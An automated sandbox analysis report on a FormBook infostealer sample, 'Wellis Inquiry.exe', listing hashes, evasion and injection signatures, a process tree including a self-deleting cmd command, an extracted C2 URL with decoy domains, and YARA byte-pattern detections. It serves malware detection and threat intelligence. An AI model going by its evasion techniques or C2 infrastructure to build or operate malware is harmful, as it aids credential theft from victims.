Play interactive tour

Edit tour

Windows Analysis Report Wellis Inquiry.exe

Overview

General Information

Sample Name:	Wellis Inquiry.exe
Analysis ID:	502627
MD5:	c357a8010e661a49df2e813bd22590b6
SHA1:	08ecd005e1449ec97d0405e83649686ae35f6286
SHA256:	eef137583da6deb4a1be9882cede6cec5112b74ae79c0773f45b13346c5b2890
Tags:	exe
Infos:
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected FormBook

Malicious sample detected (through community Yara rule)

Yara detected AntiVM3

System process connects to network (likely due to code injection or exploit)

Sample uses process hollowing technique

Maps a DLL or memory area into another process

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Performs DNS queries to domains with low reputation

Self deletion via cmd delete

.NET source code contains potential unpacker

Queues an APC in another process (thread injection)

Tries to detect virtualization through RDTSC time measurements

Modifies the context of a thread in another process (thread injection)

C2 URLs / IPs found in malware configuration

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Antivirus or Machine Learning detection for unpacked file

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to call native functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Contains functionality for execution timing, often used to detect debuggers

Contains long sleeps (>= 3 min)

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Sample file is different than original file name gathered from version info

Contains functionality to read the PEB

Checks if the current process is being debugged

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64

Wellis Inquiry.exe (PID: 7036 cmdline: 'C:\Users\user\Desktop\Wellis Inquiry.exe' MD5: C357A8010E661A49DF2E813BD22590B6)

Wellis Inquiry.exe (PID: 1680 cmdline: C:\Users\user\Desktop\Wellis Inquiry.exe MD5: C357A8010E661A49DF2E813BD22590B6)

explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)

cmmon32.exe (PID: 5328 cmdline: C:\Windows\SysWOW64\cmmon32.exe MD5: 2879B30A164B9F7671B5E6B2E9F8DFDA)

cmd.exe (PID: 7092 cmdline: /c del 'C:\Users\user\Desktop\Wellis Inquiry.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.psychedeliccosmetics.com/ag9v/"], "decoy": ["wordmagicshow.com", "dogparkdate.com", "quickcarehomeopathic.com", "azwar.net", "louisle1909.xyz", "section8lv.com", "felineness.com", "2888sy.com", "wadashoot.com", "kittyuniverse.com", "blushroses.com", "alaskangeneral.com", "yumoo.design", "7xkfic.com", "891827.com", "uspress1.com", "aceserial.xyz", "muellerconfidence.com", "eramakport.com", "tipsandtoesnewton.com", "withph.net", "kravesproet.quest", "restaurantemesana.com", "ghostpunk.art", "cobere9.com", "darshanshastra.com", "barnhsartcrane.com", "richartware.com", "welcomprom2.com", "plantvsundeadhelp.com", "hotsatisfy.com", "fullhindimovies.com", "beautynaturalcosmeticslk.com", "googglo.com", "hongyang98.com", "elishevazz.com", "ebookgratis.online", "urbanyinyoga.com", "sojuicybar.com", "seheon.email", "pokemongosrf.com", "catchytravel.com", "stonecoldice.net", "betinle137.com", "platinumridge.art", "agoodhotel.com", "preventbiotech.com", "ebonyslivestockservice.online", "billionairesboat.com", "dollpartyla.com", "naufragant.com", "cat2628.top", "ietwatiomlan.quest", "soulful-simplicity.com", "kalmmed.com", "luxuryray.com", "pknox.net", "687410.com", "blackmagiccomics.com", "usaworkerscorporation.com", "ovmfinacial.com", "marunouchi1.com", "feshwal.com", "qupontgon.quest"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000004.00000000.715332371.000000000E4B9000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000000.715332371.000000000E4B9000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x46b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x41a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x47b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000000.715332371.000000000E4B9000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x6ad9:$sqlite3step: 68 34 1C 7B E1 0x6bec:$sqlite3step: 68 34 1C 7B E1 0x6b08:$sqlite3text: 68 38 2A 90 C5 0x6c2d:$sqlite3text: 68 38 2A 90 C5 0x6b1b:$sqlite3blob: 68 53 D8 7F 8C 0x6c43:$sqlite3blob: 68 53 D8 7F 8C
00000003.00000002.745846154.0000000001090000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000003.00000002.745846154.0000000001090000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000002.745846154.0000000001090000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000000.699912453.000000000E4B9000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000000.699912453.000000000E4B9000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x46b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x41a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x47b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000000.699912453.000000000E4B9000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x6ad9:$sqlite3step: 68 34 1C 7B E1 0x6bec:$sqlite3step: 68 34 1C 7B E1 0x6b08:$sqlite3text: 68 38 2A 90 C5 0x6c2d:$sqlite3text: 68 38 2A 90 C5 0x6b1b:$sqlite3blob: 68 53 D8 7F 8C 0x6c43:$sqlite3blob: 68 53 D8 7F 8C
0000000B.00000002.922603929.0000000002D20000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000B.00000002.922603929.0000000002D20000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000B.00000002.922603929.0000000002D20000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
0000000B.00000002.921975794.0000000000360000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000B.00000002.921975794.0000000000360000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000B.00000002.921975794.0000000000360000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
0000000B.00000002.922486626.0000000002C20000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000B.00000002.922486626.0000000002C20000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000B.00000002.922486626.0000000002C20000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
00000003.00000002.745321491.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000003.00000002.745321491.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000002.745321491.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
00000003.00000002.745670982.0000000000C10000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000003.00000002.745670982.0000000000C10000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000002.745670982.0000000000C10000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.670890366.0000000003341000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000000.00000002.671146888.0000000004349000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.671146888.0000000004349000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x23af78:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x23b312:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x262d98:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x263132:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x247025:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x26ee45:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x246b11:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x26e931:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x247127:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x26ef47:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x24729f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x26f0bf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x23bd2a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x263b4a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x245d8c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x26dbac:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x23caa2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x2648c2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x24c517:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x274337:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x24d5ba:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.671146888.0000000004349000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x249449:$sqlite3step: 68 34 1C 7B E1 0x24955c:$sqlite3step: 68 34 1C 7B E1 0x271269:$sqlite3step: 68 34 1C 7B E1 0x27137c:$sqlite3step: 68 34 1C 7B E1 0x249478:$sqlite3text: 68 38 2A 90 C5 0x24959d:$sqlite3text: 68 38 2A 90 C5 0x271298:$sqlite3text: 68 38 2A 90 C5 0x2713bd:$sqlite3text: 68 38 2A 90 C5 0x24948b:$sqlite3blob: 68 53 D8 7F 8C 0x2495b3:$sqlite3blob: 68 53 D8 7F 8C 0x2712ab:$sqlite3blob: 68 53 D8 7F 8C 0x2713d3:$sqlite3blob: 68 53 D8 7F 8C
Process Memory Space: Wellis Inquiry.exe PID: 7036	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 24 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
3.2.Wellis Inquiry.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
3.2.Wellis Inquiry.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
3.2.Wellis Inquiry.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
3.2.Wellis Inquiry.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
3.2.Wellis Inquiry.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19e4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
3.2.Wellis Inquiry.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15cd9:$sqlite3step: 68 34 1C 7B E1 0x15dec:$sqlite3step: 68 34 1C 7B E1 0x15d08:$sqlite3text: 68 38 2A 90 C5 0x15e2d:$sqlite3text: 68 38 2A 90 C5 0x15d1b:$sqlite3blob: 68 53 D8 7F 8C 0x15e43:$sqlite3blob: 68 53 D8 7F 8C
0.2.Wellis Inquiry.exe.339002c.1.raw.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
0.2.Wellis Inquiry.exe.44b68c0.3.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0.2.Wellis Inquiry.exe.44b68c0.3.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0xcd6b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xcda52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xf54d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xf5872:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xd9765:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x101585:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0xd9251:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x101071:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0xd9867:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x101687:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0xd99df:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x1017ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xce46a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0xf628a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0xd84cc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x1002ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xcf1e2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0xf7002:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0xdec57:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x106a77:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xdfcfa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0.2.Wellis Inquiry.exe.44b68c0.3.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0xdbb89:$sqlite3step: 68 34 1C 7B E1 0xdbc9c:$sqlite3step: 68 34 1C 7B E1 0x1039a9:$sqlite3step: 68 34 1C 7B E1 0x103abc:$sqlite3step: 68 34 1C 7B E1 0xdbbb8:$sqlite3text: 68 38 2A 90 C5 0xdbcdd:$sqlite3text: 68 38 2A 90 C5 0x1039d8:$sqlite3text: 68 38 2A 90 C5 0x103afd:$sqlite3text: 68 38 2A 90 C5 0xdbbcb:$sqlite3blob: 68 53 D8 7F 8C 0xdbcf3:$sqlite3blob: 68 53 D8 7F 8C 0x1039eb:$sqlite3blob: 68 53 D8 7F 8C 0x103b13:$sqlite3blob: 68 53 D8 7F 8C
0.2.Wellis Inquiry.exe.446c2a0.2.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0.2.Wellis Inquiry.exe.446c2a0.2.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x117cd8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x118072:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x13faf8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x13fe92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x123d85:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14bba5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x123871:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14b691:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x123e87:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14bca7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x123fff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x14be1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x118a8a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1408aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x122aec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x14a90c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x119802:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x141622:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x129277:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x151097:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x12a31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0.2.Wellis Inquiry.exe.446c2a0.2.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x1261a9:$sqlite3step: 68 34 1C 7B E1 0x1262bc:$sqlite3step: 68 34 1C 7B E1 0x14dfc9:$sqlite3step: 68 34 1C 7B E1 0x14e0dc:$sqlite3step: 68 34 1C 7B E1 0x1261d8:$sqlite3text: 68 38 2A 90 C5 0x1262fd:$sqlite3text: 68 38 2A 90 C5 0x14dff8:$sqlite3text: 68 38 2A 90 C5 0x14e11d:$sqlite3text: 68 38 2A 90 C5 0x1261eb:$sqlite3blob: 68 53 D8 7F 8C 0x126313:$sqlite3blob: 68 53 D8 7F 8C 0x14e00b:$sqlite3blob: 68 53 D8 7F 8C 0x14e133:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 8 entries

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000003.00000002.745846154.0000000001090000.00000040.00020000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.psychedeliccosmetics.com/ag9v/"], "decoy": ["wordmagicshow.com", "dogparkdate.com", "quickcarehomeopathic.com", "azwar.net", "louisle1909.xyz", "section8lv.com", "felineness.com", "2888sy.com", "wadashoot.com", "kittyuniverse.com", "blushroses.com", "alaskangeneral.com", "yumoo.design", "7xkfic.com", "891827.com", "uspress1.com", "aceserial.xyz", "muellerconfidence.com", "eramakport.com", "tipsandtoesnewton.com", "withph.net", "kravesproet.quest", "restaurantemesana.com", "ghostpunk.art", "cobere9.com", "darshanshastra.com", "barnhsartcrane.com", "richartware.com", "welcomprom2.com", "plantvsundeadhelp.com", "hotsatisfy.com", "fullhindimovies.com", "beautynaturalcosmeticslk.com", "googglo.com", "hongyang98.com", "elishevazz.com", "ebookgratis.online", "urbanyinyoga.com", "sojuicybar.com", "seheon.email", "pokemongosrf.com", "catchytravel.com", "stonecoldice.net", "betinle137.com", "platinumridge.art", "agoodhotel.com", "preventbiotech.com", "ebonyslivestockservice.online", "billionairesboat.com", "dollpartyla.com", "naufragant.com", "cat2628.top", "ietwatiomlan.quest", "soulful-simplicity.com", "kalmmed.com", "luxuryray.com", "pknox.net", "687410.com", "blackmagiccomics.com", "usaworkerscorporation.com", "ovmfinacial.com", "marunouchi1.com", "feshwal.com", "qupontgon.quest"]}

Yara detected FormBook

Show sources

Source: Yara match	File source: 3.2.Wellis Inquiry.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Wellis Inquiry.exe.400000.0.unpack, type: UNPACKEDPE
